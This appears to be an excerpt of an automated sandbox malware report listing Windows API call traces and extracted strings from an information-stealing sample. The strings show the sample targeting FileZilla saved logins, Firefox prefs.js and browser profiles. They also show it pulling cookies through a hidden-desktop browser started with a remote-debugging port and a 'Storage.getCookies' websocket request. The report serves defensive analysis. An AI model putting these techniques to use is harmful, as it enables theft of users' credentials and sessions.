                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 2641759534-2314656281
                        • Opcode ID: ee1a57ab8dbedb0a60efc3a8b10ca1b8f29670fc0ffe936e34650e2bba96f2a8
                        • Instruction ID: 73f247c1c263e6403a7b2c1b8997b9dd73ae9a725e1873c344bf719dfcd93d5b
                        • Opcode Fuzzy Hash: ee1a57ab8dbedb0a60efc3a8b10ca1b8f29670fc0ffe936e34650e2bba96f2a8
                        • Instruction Fuzzy Hash: 8E02C270A0121AABDB20ABB1DD49EAF7FB9FF04704F049419F905E7291DB78DD128B64
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504B7F
                        • lstrlen.KERNEL32(00524CA8), ref: 00504B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BA7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 00504BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00504BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: prefs.js
                        • API String ID: 2567437900-3783873740
                        • Opcode ID: 8243f22c4adc585059ffb26b98bcc1abd5db046bc1cfc3c532085a227036efa5
                        • Instruction ID: 13e684109c2ff146029e2d2e956f535dc7aef8171f3c03e178dcb6e7bb88c9c0
                        • Opcode Fuzzy Hash: 8243f22c4adc585059ffb26b98bcc1abd5db046bc1cfc3c532085a227036efa5
                        • Instruction Fuzzy Hash: 1A922A70A116068FDB24CF29D948B6EBBE5BF44314F19C0ADE9099B2A1E775DC42CF84
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00501291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005012BF
                        • lstrlen.KERNEL32(00524CA8), ref: 005012CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012E7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 005012F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0050133A
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050135C
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00501376
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005013AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 005013D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005013E2
                        • lstrlen.KERNEL32(00521794), ref: 005013ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050140A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501416
                        • lstrlen.KERNEL32(?), ref: 00501423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501443
                        • lstrcat.KERNEL32(00000000,?), ref: 00501451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050147A
                        • StrCmpCA.SHLWAPI(?,0103CF38), ref: 005014A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 005014E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501535
                        • StrCmpCA.SHLWAPI(?,0103D268), ref: 00501552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501593
                        • lstrcpy.KERNEL32(00000000,?), ref: 005015BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005015E4
                        • StrCmpCA.SHLWAPI(?,0103D058), ref: 00501602
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501633
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050165C
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501685
                        • StrCmpCA.SHLWAPI(?,0103CF50), ref: 005016B3
                        • lstrcpy.KERNEL32(00000000,?), ref: 005016F4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050171D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501745
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005017BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 005017F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050181C
                        • FindClose.KERNEL32(00000000), ref: 0050182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: fdb94736a6c46cddafd4c28a557384ab4f5a823d43963e963a308fa897f03451
                        • Instruction ID: 87768f6adbd87102f48e5c5a47f694b2fc8ef6bfd6d3f59f040e9fa33f798bc8
                        • Opcode Fuzzy Hash: fdb94736a6c46cddafd4c28a557384ab4f5a823d43963e963a308fa897f03451
                        • Instruction Fuzzy Hash: 6D129070A1060A9BCB20EF75DD89AAF7BB8BF44304F04852DF946D7290DB78DC458B99
                        APIs
                        • wsprintfA.USER32 ref: 0050CBFC
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050CC13
                        • lstrcat.KERNEL32(?,?), ref: 0050CC5F
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050CC71
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050CC8B
                        • wsprintfA.USER32 ref: 0050CCB0
                        • PathMatchSpecA.SHLWAPI(?,01038B70), ref: 0050CCE2
                        • CoInitialize.OLE32(00000000), ref: 0050CCEE
                          • Part of subcall function 0050CAE0: CoCreateInstance.COMBASE(0051B110,00000000,00000001,0051B100,?), ref: 0050CB06
                          • Part of subcall function 0050CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0050CB46
                          • Part of subcall function 0050CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0050CBC9
                        • CoUninitialize.COMBASE ref: 0050CD09
                        • lstrcat.KERNEL32(?,?), ref: 0050CD2E
                        • lstrlen.KERNEL32(?), ref: 0050CD3B
                        • StrCmpCA.SHLWAPI(?,0051CFEC), ref: 0050CD55
                        • wsprintfA.USER32 ref: 0050CD7D
                        • wsprintfA.USER32 ref: 0050CD9C
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0050CDB0
                        • wsprintfA.USER32 ref: 0050CDD8
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0050CDF1
                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0050CE10
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 0050CE28
                        • CloseHandle.KERNEL32(00000000), ref: 0050CE33
                        • CloseHandle.KERNEL32(00000000), ref: 0050CE3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0050CE54
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050CE94
                        • FindNextFileA.KERNEL32(?,?), ref: 0050CF8D
                        • FindClose.KERNEL32(?), ref: 0050CF9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                        • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 3860919712-2388001722
                        • Opcode ID: bee480ed6b588a2119a528fd450eedfd2ff299e1c47df6aee88c8feaafe58428
                        • Instruction ID: 3d539445b450d535f09e1d6da03d0b391b9cd3cb0767ce3ae7be653ecd3bebc5
                        • Opcode Fuzzy Hash: bee480ed6b588a2119a528fd450eedfd2ff299e1c47df6aee88c8feaafe58428
                        • Instruction Fuzzy Hash: 36C1A371A002199FDB60DF64DC45EEE7B79FF89300F048599FA0997280EA34AE85CF55
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00501291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005012BF
                        • lstrlen.KERNEL32(00524CA8), ref: 005012CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012E7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 005012F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0050133A
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050135C
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00501376
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005013AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 005013D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005013E2
                        • lstrlen.KERNEL32(00521794), ref: 005013ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050140A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501416
                        • lstrlen.KERNEL32(?), ref: 00501423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501443
                        • lstrcat.KERNEL32(00000000,?), ref: 00501451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050147A
                        • StrCmpCA.SHLWAPI(?,0103CF38), ref: 005014A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 005014E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501535
                        • StrCmpCA.SHLWAPI(?,0103D268), ref: 00501552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501593
                        • lstrcpy.KERNEL32(00000000,?), ref: 005015BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005015E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005017BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 005017F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050181C
                        • FindClose.KERNEL32(00000000), ref: 0050182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: 69e334aa731cb8d863ea03ca99871338b3dfbb9f6542ba728230eb1988643c30
                        • Instruction ID: f7047453aa1548181d6d680c4839594966ac085a43746f78474021f1f89adb97
                        • Opcode Fuzzy Hash: 69e334aa731cb8d863ea03ca99871338b3dfbb9f6542ba728230eb1988643c30
                        • Instruction Fuzzy Hash: B4C1B270A1060A9BCB31EF75DD89AAF7BB8FF00304F044429F94697291DB78DD468B99
                        APIs
                        • memset.MSVCRT ref: 004F9790
                        • lstrcat.KERNEL32(?,?), ref: 004F97A0
                        • lstrcat.KERNEL32(?,?), ref: 004F97B1
                        • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004F97C3
                        • memset.MSVCRT ref: 004F97D7
                          • Part of subcall function 00513E70: lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00513EA5
                          • Part of subcall function 00513E70: lstrcpy.KERNEL32(00000000,01039A78), ref: 00513ECF
                          • Part of subcall function 00513E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,004F134E,?,0000001A), ref: 00513ED9
                        • wsprintfA.USER32 ref: 004F9806
                        • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 004F9827
                        • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 004F9844
                          • Part of subcall function 005146A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005146B9
                          • Part of subcall function 005146A0: Process32First.KERNEL32(00000000,00000128), ref: 005146C9
                          • Part of subcall function 005146A0: Process32Next.KERNEL32(00000000,00000128), ref: 005146DB
                          • Part of subcall function 005146A0: StrCmpCA.SHLWAPI(?,?), ref: 005146ED
                          • Part of subcall function 005146A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00514702
                          • Part of subcall function 005146A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00514711
                          • Part of subcall function 005146A0: CloseHandle.KERNEL32(00000000), ref: 00514718
                          • Part of subcall function 005146A0: Process32Next.KERNEL32(00000000,00000128), ref: 00514726
                          • Part of subcall function 005146A0: CloseHandle.KERNEL32(00000000), ref: 00514731
                        • lstrcat.KERNEL32(00000000,?), ref: 004F9878
                        • lstrcat.KERNEL32(00000000,?), ref: 004F9889
                        • lstrcat.KERNEL32(00000000,00524B60), ref: 004F989B
                        • memset.MSVCRT ref: 004F98AF
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004F98D4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F9903
                        • StrStrA.SHLWAPI(00000000,0103DFD8), ref: 004F9919
                        • lstrcpyn.KERNEL32(007293D0,00000000,00000000), ref: 004F9938
                        • lstrlen.KERNEL32(?), ref: 004F994B
                        • wsprintfA.USER32 ref: 004F995B
                        • lstrcpy.KERNEL32(?,00000000), ref: 004F9971
                        • Sleep.KERNEL32(00001388), ref: 004F99E7
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F92E1
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F92FA
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F9399
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F93E6
                          • Part of subcall function 00514740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00514759
                          • Part of subcall function 00514740: Process32First.KERNEL32(00000000,00000128), ref: 00514769
                          • Part of subcall function 00514740: Process32Next.KERNEL32(00000000,00000128), ref: 0051477B
                          • Part of subcall function 00514740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051479C
                          • Part of subcall function 00514740: TerminateProcess.KERNEL32(00000000,00000000), ref: 005147AB
                          • Part of subcall function 00514740: CloseHandle.KERNEL32(00000000), ref: 005147B2
                          • Part of subcall function 00514740: Process32Next.KERNEL32(00000000,00000128), ref: 005147C0
                          • Part of subcall function 00514740: CloseHandle.KERNEL32(00000000), ref: 005147CB
                        • CloseDesktop.USER32(?), ref: 004F9A1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                        • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                        • API String ID: 958055206-1862457068
                        • Opcode ID: 5496307f3dacdd6fc3f13e9e9664c36133381ebc1dc01c608c6fa7f4d784d485
                        • Instruction ID: 861074b958468b24be15263ef23f1c83073546378cfc655033acfcc1aeeb7721
                        • Opcode Fuzzy Hash: 5496307f3dacdd6fc3f13e9e9664c36133381ebc1dc01c608c6fa7f4d784d485
                        • Instruction Fuzzy Hash: 4C919571A10218ABEB20DF64DC49FEE77B8FF48700F148199F609A7281DB749E458FA4
                        APIs
                        • wsprintfA.USER32 ref: 0050E22C
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050E243
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050E263
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050E27D
                        • wsprintfA.USER32 ref: 0050E2A2
                        • StrCmpCA.SHLWAPI(?,0051CFEC), ref: 0050E2B4
                        • wsprintfA.USER32 ref: 0050E2D1
                          • Part of subcall function 0050EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0050EE12
                        • wsprintfA.USER32 ref: 0050E2F0
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0050E304
                        • lstrcat.KERNEL32(?,0103E398), ref: 0050E335
                        • lstrcat.KERNEL32(?,00521794), ref: 0050E347
                        • lstrcat.KERNEL32(?,?), ref: 0050E358
                        • lstrcat.KERNEL32(?,00521794), ref: 0050E36A
                        • lstrcat.KERNEL32(?,?), ref: 0050E37E
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0050E394
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E3D2
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E422
                        • DeleteFileA.KERNEL32(?), ref: 0050E45C
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050E49B
                        • FindClose.KERNEL32(00000000), ref: 0050E4AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                        • String ID: %s\%s$%s\*
                        • API String ID: 1375681507-2848263008
                        • Opcode ID: 2949cd4d3ba05f1f5e4642e7855a57cf8b6fc27b8c78bec33aac25e1d4768c25
                        • Instruction ID: a8fabe24c49623c0f514ed65ffba0df01608904d7e7165bf2db424a9ac220c41
                        • Opcode Fuzzy Hash: 2949cd4d3ba05f1f5e4642e7855a57cf8b6fc27b8c78bec33aac25e1d4768c25
                        • Instruction Fuzzy Hash: F381A27190021D9BCB20EF65DD49EEF7B79FF44300F048999B60A93190DB79AA45CF94
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F16E2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F176C
                        • lstrcat.KERNEL32(00000000), ref: 004F1776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F17A2
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F18F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F18FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat
                        • String ID: \*.*
                        • API String ID: 2276651480-1173974218
                        • Opcode ID: 2186b0796d91b4f5b0c85f54af5e771f781c55adeeda3c2d9186bbe9e8e2acfe
                        • Instruction ID: 7178292dd0ed4abbd2a8f91fa0f077e95808ad11a86878fb460449675cbf7897
                        • Opcode Fuzzy Hash: 2186b0796d91b4f5b0c85f54af5e771f781c55adeeda3c2d9186bbe9e8e2acfe
                        • Instruction Fuzzy Hash: F2819671A1021EDBCB21EF65D985ABF77B8EF14304F04412AFA0597261CBBC9D11CB99
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0050DD45
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0050DD4C
                        • wsprintfA.USER32 ref: 0050DD62
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050DD79
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050DD9C
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050DDB6
                        • wsprintfA.USER32 ref: 0050DDD4
                        • DeleteFileA.KERNEL32(?), ref: 0050DE20
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0050DDED
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                          • Part of subcall function 0050D980: memset.MSVCRT ref: 0050D9A1
                          • Part of subcall function 0050D980: memset.MSVCRT ref: 0050D9B3
                          • Part of subcall function 0050D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050D9DB
                          • Part of subcall function 0050D980: lstrcpy.KERNEL32(00000000,?), ref: 0050DA0E
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,00000000), ref: 0050DA1C
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,0103DF78), ref: 0050DA36
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,?), ref: 0050DA4A
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,0103CFE0), ref: 0050DA5E
                          • Part of subcall function 0050D980: lstrcpy.KERNEL32(00000000,?), ref: 0050DA8E
                          • Part of subcall function 0050D980: GetFileAttributesA.KERNEL32(00000000), ref: 0050DA95
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050DE2E
                        • FindClose.KERNEL32(00000000), ref: 0050DE3D
                        • lstrcat.KERNEL32(?,0103E398), ref: 0050DE66
                        • lstrcat.KERNEL32(?,0103D1E8), ref: 0050DE7A
                        • lstrlen.KERNEL32(?), ref: 0050DE84
                        • lstrlen.KERNEL32(?), ref: 0050DE92
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050DED2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                        • String ID: %s\%s$%s\*
                        • API String ID: 4184593125-2848263008
                        • Opcode ID: dced78942a9d0a7fe10161e224e8d7c6254044b784b04f85e4d1e4f1a60d1fba
                        • Instruction ID: ec2819db2a4a51be63f284cf2ba1ae5fd4b80f093bbb93e281c11b44765ecf3a
                        • Opcode Fuzzy Hash: dced78942a9d0a7fe10161e224e8d7c6254044b784b04f85e4d1e4f1a60d1fba
                        • Instruction Fuzzy Hash: BB618471A00209ABCB20EFB4DD49AEE7B79FF48300F048599B60597291DB39AA55CF54
                        APIs
                        • wsprintfA.USER32 ref: 0050D54D
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050D564
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050D584
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050D59E
                        • lstrcat.KERNEL32(?,0103E398), ref: 0050D5E3
                        • lstrcat.KERNEL32(?,0103E2C8), ref: 0050D5F7
                        • lstrcat.KERNEL32(?,?), ref: 0050D60B
                        • lstrcat.KERNEL32(?,?), ref: 0050D61C
                        • lstrcat.KERNEL32(?,00521794), ref: 0050D62E
                        • lstrcat.KERNEL32(?,?), ref: 0050D642
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050D682
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050D6D2
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050D737
                        • FindClose.KERNEL32(00000000), ref: 0050D746
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 50252434-4073750446
                        • Opcode ID: 39b9baf7c8d16cc93dd32f02a6390d1c49fbdbbbdc5332b24528934b498e649f
                        • Instruction ID: 8b88dd3aaa7c251af1da7cf300ce6a5a3953b4719b91ca10818552da74ac5fb9
                        • Opcode Fuzzy Hash: 39b9baf7c8d16cc93dd32f02a6390d1c49fbdbbbdc5332b24528934b498e649f
                        • Instruction Fuzzy Hash: 2E618871D1011D9BCB20EFB5DD85AEE7BB8FF48304F048499E64993290DB38AA55CF94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                        • API String ID: 909987262-758292691
                        • Opcode ID: 34969c36d628871d905c7e1d2ad242c16a3a71cc99d485d7540b34ff4ed6b9e4
                        • Instruction ID: b9ece77c518b11548338c56a7a4c1a66a83222f5c8a939e43685e4c0020c44c3
                        • Opcode Fuzzy Hash: 34969c36d628871d905c7e1d2ad242c16a3a71cc99d485d7540b34ff4ed6b9e4
                        • Instruction Fuzzy Hash: B0A24A71D01269DBEF20DFA8C8407EDBBB6BF88300F1485AAD518A7241EB755E85CF91
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005023D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005023F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00502402
                        • lstrlen.KERNEL32(\*.*), ref: 0050240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00502436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00502486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 6704a89c6821bd71a614766c53604533278dce70e1401ff2937402bb1d8936cf
                        • Instruction ID: a7b8f52e8488cd9897bc4ebdbfb8cf658b2d016604a93a5e384fd89d8b86d531
                        • Opcode Fuzzy Hash: 6704a89c6821bd71a614766c53604533278dce70e1401ff2937402bb1d8936cf
                        • Instruction Fuzzy Hash: AA418630A1151D8BCB31EF25DE89AAE77A4FF10308F045129FA4A97191CBB89C518B98
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005146B9
                        • Process32First.KERNEL32(00000000,00000128), ref: 005146C9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 005146DB
                        • StrCmpCA.SHLWAPI(?,?), ref: 005146ED
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00514702
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00514711
                        • CloseHandle.KERNEL32(00000000), ref: 00514718
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00514726
